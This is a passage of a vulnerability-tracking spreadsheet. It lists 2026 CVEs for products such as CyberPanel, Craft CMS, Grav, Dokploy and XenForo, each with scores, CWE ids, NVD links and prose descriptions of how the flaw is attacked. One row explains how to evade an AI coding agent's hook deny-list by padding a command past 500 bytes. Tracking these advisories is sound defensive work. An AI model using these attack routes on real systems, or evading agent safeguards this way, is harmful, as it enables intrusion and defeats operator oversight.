          <t>CyberPanel 2.4.3, fixed in commit eca0c3c, contains an authenticated remote code execution vulnerability in the remote backup feature that allows authenticated attackers to gain root-level SSH access by supplying a malicious remote server address. Attackers can exploit the unverified SSH public key retrieval process to write an attacker-controlled public key directly to /root/.ssh/authorized_keys, granting persistent root access to the host system.</t>
        </is>
      </c>
      <c r="M1206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71965</t>
        </is>
      </c>
    </row>
    <row r="1207">
      <c r="A1207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71966</t>
        </is>
      </c>
      <c r="C1207" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1207" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1207" s="5" t="inlineStr"/>
      <c r="F1207" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="G1207" s="5" t="inlineStr"/>
      <c r="H1207" s="5" t="inlineStr"/>
      <c r="I1207" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J1207" s="5" t="inlineStr"/>
      <c r="K1207" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1207" s="5" t="inlineStr">
        <is>
          <t>CyberPanel 2.4.3, fixed in commit eca0c3c, contains an authenticated command injection vulnerability in the remote backup transfer feature that allows authenticated attackers to execute arbitrary OS commands by controlling a remote server's API response. Attackers can inject malicious commands through a crafted directory name in the remote server's API response, which bypasses security middleware validation and is passed unsanitized to the OS command execution function.</t>
        </is>
      </c>
      <c r="M1207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71966</t>
        </is>
      </c>
    </row>
    <row r="1208">
      <c r="A1208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71981</t>
        </is>
      </c>
      <c r="C1208" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1208" s="5" t="inlineStr"/>
      <c r="F1208" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1208" s="5" t="inlineStr"/>
      <c r="H1208" s="5" t="inlineStr"/>
      <c r="I1208" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1208" s="5" t="inlineStr"/>
      <c r="K1208" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L1208" s="5" t="inlineStr">
        <is>
          <t>Cypht before 2.12.2 contains a PHP object injection vulnerability that allows authenticated attackers to execute arbitrary operating system commands by supplying a crafted PHP object graph in the back_query GET parameter of the logout handler. Attackers can pass a base64-encoded serialized payload through this parameter, which is decoded and passed directly to unserialize() without an allow-list, signature check, or type restriction, enabling gadget-chain exploitation to achieve remote code execution as the web server process.</t>
        </is>
      </c>
      <c r="M1208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71981</t>
        </is>
      </c>
    </row>
    <row r="1209">
      <c r="A1209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72730</t>
        </is>
      </c>
      <c r="C1209" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1209" s="5" t="inlineStr"/>
      <c r="F1209" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1209" s="5" t="inlineStr"/>
      <c r="H1209" s="5" t="inlineStr"/>
      <c r="I1209" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J1209" s="5" t="inlineStr"/>
      <c r="K1209" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1209" s="5" t="inlineStr">
        <is>
          <t>Discourse is an open-source discussion platform. Prior to 2026.1.6, 2026.5.2, 2026.6.1, and 2026.7.0, the Rich Text Editor rendered a chat-transcript username as HTML, allowing stored cross-site scripting. This issue is fixed in versions 2026.1.6, 2026.5.2, 2026.6.1, and 2026.7.0.</t>
        </is>
      </c>
      <c r="M1209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72730</t>
        </is>
      </c>
    </row>
    <row r="1210">
      <c r="A1210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72767</t>
        </is>
      </c>
      <c r="C1210" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1210" s="5" t="inlineStr"/>
      <c r="F1210" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1210" s="5" t="inlineStr"/>
      <c r="H1210" s="5" t="inlineStr"/>
      <c r="I1210" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1210" s="5" t="inlineStr"/>
      <c r="K1210" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1210" s="5" t="inlineStr">
        <is>
          <t>n8n before 1.123.67, 2.x before 2.31.5, and 2.32.x before 2.32.1 contain a remote code execution vulnerability in the Git node. Authenticated users with rights to create and execute workflows can stage a crafted local repository that causes git to run hooks under default git security settings, executing arbitrary commands as the n8n process user. Both self-hosted and cloud instances are affected.</t>
        </is>
      </c>
      <c r="M1210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72767</t>
        </is>
      </c>
    </row>
    <row r="1211">
      <c r="A1211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72779</t>
        </is>
      </c>
      <c r="C1211" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1211" s="5" t="inlineStr"/>
      <c r="F1211" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1211" s="5" t="inlineStr"/>
      <c r="H1211" s="5" t="inlineStr"/>
      <c r="I1211" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1211" s="5" t="inlineStr"/>
      <c r="K1211" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L1211" s="5" t="inlineStr">
        <is>
          <t>Craft CMS 5.0.0-RC1 before 5.10.6 and 4.0.0-RC1 before 4.18.2 contain an arbitrary file read vulnerability. The create() Twig function restricts class instantiation using a 5-entry blocklist that does not include SplFileObject, allowing an authenticated administrator (with allowAdminChanges=true) to configure a malicious entry type title or URI format that instantiates SplFileObject in a non-sandboxed template context. When a user subsequently creates an entry in the affected section, arbitrary files on the server (such as .env containing the security key and database credentials) are read and rendered as entry titles.</t>
        </is>
      </c>
      <c r="M1211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72779</t>
        </is>
      </c>
    </row>
    <row r="1212">
      <c r="A1212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72781</t>
        </is>
      </c>
      <c r="C1212" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1212" s="5" t="inlineStr"/>
      <c r="F1212" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1212" s="5" t="inlineStr"/>
      <c r="H1212" s="5" t="inlineStr"/>
      <c r="I1212" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1212" s="5" t="inlineStr"/>
      <c r="K1212" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L1212" s="5" t="inlineStr">
        <is>
          <t>Craft CMS versions &gt;= 5.0.0-RC1 before 5.10.7 and &gt;= 4.0.0-RC1 before 4.18.3 contain a remote code execution vulnerability in the Twig sandbox mechanism. Because Craft marks the ElementInterface as safe (via the AllowedInSandbox attribute) and the sandbox allowlisting extends to the entire class hierarchy (craft\base\Component up to yii\base\Component), an authenticated attacker with permission to access the control panel can render a malicious Twig template that abuses the yii\base\Component arbitrary function-call gadget to execute arbitrary code, even when the Twig sandbox is enabled via enableTwigSandbox().</t>
        </is>
      </c>
      <c r="M1212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72781</t>
        </is>
      </c>
    </row>
    <row r="1213">
      <c r="A1213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72819</t>
        </is>
      </c>
      <c r="C1213" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1213" s="5" t="inlineStr"/>
      <c r="F1213" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1213" s="5" t="inlineStr"/>
      <c r="H1213" s="5" t="inlineStr"/>
      <c r="I1213" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
      <c r="J1213" s="5" t="inlineStr"/>
      <c r="K1213" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1213" s="5" t="inlineStr">
        <is>
          <t>Grav CMS before 2.0.13 contains a remote code execution vulnerability in the Flex Objects plugin settings validation that allows authenticated users to execute arbitrary code by uploading a ZIP file containing PHP code. Attackers can bypass routine name validation by using array notation instead of string notation, call the unZip routine with a malicious archive, and write PHP files to the web root for execution.</t>
        </is>
      </c>
      <c r="M1213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72819</t>
        </is>
      </c>
    </row>
    <row r="1214">
      <c r="A1214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72826</t>
        </is>
      </c>
      <c r="C1214" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1214" s="5" t="inlineStr"/>
      <c r="F1214" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1214" s="5" t="inlineStr"/>
      <c r="H1214" s="5" t="inlineStr"/>
      <c r="I1214" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
      <c r="J1214" s="5" t="inlineStr"/>
      <c r="K1214" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="L1214" s="5" t="inlineStr">
        <is>
          <t>The getgrav/grav-plugin-api plugin before 1.0.13 fails to validate that the scopes of a newly created API key are a subset of the caller's scopes in createApiKey. The self-target path of requireApiKeyPermission() requires only the baseline api.access scope, and the new key's scopes are read directly from the request body with no subset check. An attacker holding a minimal-scope API key on a super account can submit an empty scopes array to mint an unscoped, full-access super key, bypassing scope restrictions (and enabling further chains such as configuration write to RCE).</t>
        </is>
      </c>
      <c r="M1214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72826</t>
        </is>
      </c>
    </row>
    <row r="1215">
      <c r="A1215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72827</t>
        </is>
      </c>
      <c r="C1215" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1215" s="5" t="inlineStr"/>
      <c r="F1215" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1215" s="5" t="inlineStr"/>
      <c r="H1215" s="5" t="inlineStr"/>
      <c r="I1215" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
      <c r="J1215" s="5" t="inlineStr"/>
      <c r="K1215" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L1215" s="5" t="inlineStr">
        <is>
          <t>Grav CMS before 2.0.13 contains a server-side template injection vulnerability in email-action parameters that allows low-privileged page editors to execute arbitrary operating-system commands. Attackers can inject Twig payloads using the unsandboxed find filter in email subject, body, to, or from fields to achieve remote code execution when forms are submitted.</t>
        </is>
      </c>
      <c r="M1215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72827</t>
        </is>
      </c>
    </row>
    <row r="1216">
      <c r="A1216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72837</t>
        </is>
      </c>
      <c r="C1216" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1216" s="5" t="inlineStr"/>
      <c r="F1216" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1216" s="5" t="inlineStr"/>
      <c r="H1216" s="5" t="inlineStr"/>
      <c r="I1216" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
      <c r="J1216" s="5" t="inlineStr"/>
      <c r="K1216" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L1216" s="5" t="inlineStr">
        <is>
          <t>File Browser versions before 2.63.20 fail to honor the createUserDir isolation in proxy and hook authentication auto-provisioning paths. Attackers with valid upstream-authenticated credentials can read, modify, delete, and share files belonging to other users by exploiting the server root scope assignment.</t>
        </is>
      </c>
      <c r="M1216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72837</t>
        </is>
      </c>
    </row>
    <row r="1217">
      <c r="A1217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72840</t>
        </is>
      </c>
      <c r="C1217" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1217" s="5" t="inlineStr"/>
      <c r="F1217" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1217" s="5" t="inlineStr"/>
      <c r="H1217" s="5" t="inlineStr"/>
      <c r="I1217" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1217" s="5" t="inlineStr"/>
      <c r="K1217" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="L1217" s="5" t="inlineStr">
        <is>
          <t>OpenWrt LuCI contains an overly permissive ACL definition in luci-mod-system-mounts that grants write access to /etc/crontabs/root to users intended only for mount configuration. Authenticated users with only the mount-configuration ACL group can append arbitrary cron entries via ubus file.write, which the default busybox crond daemon executes as root within one minute.</t>
        </is>
      </c>
      <c r="M1217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72840</t>
        </is>
      </c>
    </row>
    <row r="1218">
      <c r="A1218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72870</t>
        </is>
      </c>
      <c r="C1218" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1218" s="5" t="inlineStr"/>
      <c r="F1218" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1218" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1218" s="5" t="inlineStr"/>
      <c r="I1218" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J1218" s="5" t="inlineStr"/>
      <c r="K1218" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1218" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the buildRemoteDocker() function in packages/server/src/utils/providers/docker.ts interpolates the application-controlled dockerImage value directly into a docker pull shell command. An authenticated user with project access can set a crafted dockerImage through application.update and trigger application.deploy, causing execAsync() to execute arbitrary operating-system commands as the Dokploy server process. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M1218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72870</t>
        </is>
      </c>
    </row>
    <row r="1219">
      <c r="A1219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72874</t>
        </is>
      </c>
      <c r="C1219" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1219" s="5" t="inlineStr"/>
      <c r="F1219" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1219" s="5" t="inlineStr"/>
      <c r="H1219" s="5" t="inlineStr"/>
      <c r="I1219" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J1219" s="5" t="inlineStr"/>
      <c r="K1219" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1219" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, cloneGitRepository in packages/server/src/utils/providers/git.ts interpolates customGitUrl and customGitBranch into a git clone command passed to execAsync or execAsyncRemote, allowing an authenticated user with application access to execute arbitrary operating system commands on the Dokploy host by setting a malicious custom Git URL and triggering deployment. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M1219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72874</t>
        </is>
      </c>
    </row>
    <row r="1220">
      <c r="A1220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72884</t>
        </is>
      </c>
      <c r="C1220" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1220" s="5" t="inlineStr"/>
      <c r="F1220" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1220" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1220" s="5" t="inlineStr"/>
      <c r="I1220" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J1220" s="5" t="inlineStr"/>
      <c r="K1220" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1220" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, sanitizeCommand in packages/server/src/utils/builders/compose.ts only trims whitespace and strips surrounding quotes from compose.command before exportEnvCommand and docker command interpolation, allowing an authenticated user who can update a Compose service to inject shell metacharacters and execute arbitrary commands on the Dokploy host. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M1220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72884</t>
        </is>
      </c>
    </row>
    <row r="1221">
      <c r="A1221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73062</t>
        </is>
      </c>
      <c r="C1221" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1221" s="5" t="inlineStr"/>
      <c r="F1221" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1221" s="5" t="inlineStr"/>
      <c r="H1221" s="5" t="inlineStr"/>
      <c r="I1221" s="5" t="inlineStr">
        <is>
          <t>2026-08-16</t>
        </is>
      </c>
      <c r="J1221" s="5" t="inlineStr"/>
      <c r="K1221" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1221" s="5" t="inlineStr">
        <is>
          <t>Scriban versions 3.0.0 through 7.2.0 contain a denial of service vulnerability in the array multiplication operator that allocates memory without enforcing LoopLimit or overflow-safe arithmetic checks. Attackers can supply a large integer multiplier in a template to force multi-gigabyte memory allocations, causing resource exhaustion and availability degradation.</t>
        </is>
      </c>
      <c r="M1221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73062</t>
        </is>
      </c>
    </row>
    <row r="1222">
      <c r="A1222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73081</t>
        </is>
      </c>
      <c r="C1222" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1222" s="5" t="inlineStr"/>
      <c r="F1222" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1222" s="5" t="inlineStr"/>
      <c r="H1222" s="5" t="inlineStr"/>
      <c r="I1222" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1222" s="5" t="inlineStr"/>
      <c r="K1222" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1222" s="5" t="inlineStr">
        <is>
          <t>Activepieces is an open source AI workflow automation platform. Prior to 0.80.0, the worker's code-compilation pipeline builds the on-disk path for a Code step from the step's name and passes that path to a shell-invoked build command. A step name containing shell metacharacters can break out of the intended build invocation and execute arbitrary commands during compilation before any code sandbox is created. An authenticated user with permission to create or edit a flow can execute commands as the worker process user, read and write the worker filesystem, exfiltrate environment secrets, and reach internal services available to the worker. This issue is fixed in version 0.80.0.</t>
        </is>
      </c>
      <c r="M1222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73081</t>
        </is>
      </c>
    </row>
    <row r="1223">
      <c r="A1223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73314</t>
        </is>
      </c>
      <c r="C1223" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1223" s="5" t="inlineStr"/>
      <c r="F1223" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1223" s="5" t="inlineStr"/>
      <c r="H1223" s="5" t="inlineStr"/>
      <c r="I1223" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1223" s="5" t="inlineStr"/>
      <c r="K1223" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="L1223" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a signature verification logic error in the PayPal REST webhook handler that allows unauthenticated attackers to bypass payment signature validation by submitting a webhook request with an unsupported auth_algo header value. When the algorithm cannot be mapped to a supported hash function, the verification function incorrectly returns true instead of failing, causing the caller to treat the fabricated request as verified and process the payment event without a valid PayPal signature.</t>
        </is>
      </c>
      <c r="M1223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73314</t>
        </is>
      </c>
    </row>
    <row r="1224">
      <c r="A1224" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73316</t>
        </is>
      </c>
      <c r="C1224" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1224" s="5" t="inlineStr"/>
      <c r="F1224" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1224" s="5" t="inlineStr"/>
      <c r="H1224" s="5" t="inlineStr"/>
      <c r="I1224" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1224" s="5" t="inlineStr"/>
      <c r="K1224" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L1224" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a payment replay vulnerability in the PayPal REST payment provider that allows attackers to process the same webhook payload multiple times by exploiting a missing duplicate transaction ID check. Attackers can replay a valid webhook payload to trigger duplicate payment events, resulting in repeated subscription activations and unauthorized account upgrades.</t>
        </is>
      </c>
      <c r="M1224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73316</t>
        </is>
      </c>
    </row>
    <row r="1225">
      <c r="A1225" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73413</t>
        </is>
      </c>
      <c r="C1225" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1225" s="5" t="inlineStr"/>
      <c r="F1225" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1225" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1225" s="5" t="inlineStr"/>
      <c r="I1225" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J1225" s="5" t="inlineStr"/>
      <c r="K1225" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="L1225" s="5" t="inlineStr">
        <is>
          <t>Shescape is a simple shell escape library for JavaScript. From 2.1.11 until 2.1.14 and 3.0.1, the flag-protection loop in compose in src/internal/compose.js repeatedly joins and slices flag fragments when flagProtection is enabled, which is the default, making processing quadratic in input size across the escape, escapeAll, quote, and quoteAll APIs. An attacker who can supply a large untrusted input containing many flag fragments can consume CPU and cause denial of service. This issue is fixed in versions 2.1.14 and 3.0.1.</t>
        </is>
      </c>
      <c r="M1225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73413</t>
        </is>
      </c>
    </row>
    <row r="1226">
      <c r="A1226" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73614</t>
        </is>
      </c>
      <c r="C1226" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1226" s="5" t="inlineStr"/>
      <c r="F1226" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1226" s="5" t="inlineStr"/>
      <c r="H1226" s="5" t="inlineStr"/>
      <c r="I1226" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1226" s="5" t="inlineStr"/>
      <c r="K1226" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="L1226" s="5" t="inlineStr">
        <is>
          <t>Network-AI ClaudeHookBridge before 5.15.1 truncates the target string to 500 characters before evaluating denyPatterns, while Claude Code executes the full untruncated command. Attackers can position dangerous content past byte 500 in a Bash command field to bypass the operator's hard-deny list and execute arbitrary commands.</t>
        </is>
      </c>
      <c r="M1226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73614</t>
        </is>
      </c>
    </row>
    <row r="1227">
      <c r="A1227" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73615</t>
        </is>
      </c>
      <c r="C1227" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1227" s="5" t="inlineStr"/>
      <c r="F1227" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1227" s="5" t="inlineStr"/>
      <c r="H1227" s="5" t="inlineStr"/>
      <c r="I1227" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1227" s="5" t="inlineStr"/>
      <c r="K1227" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
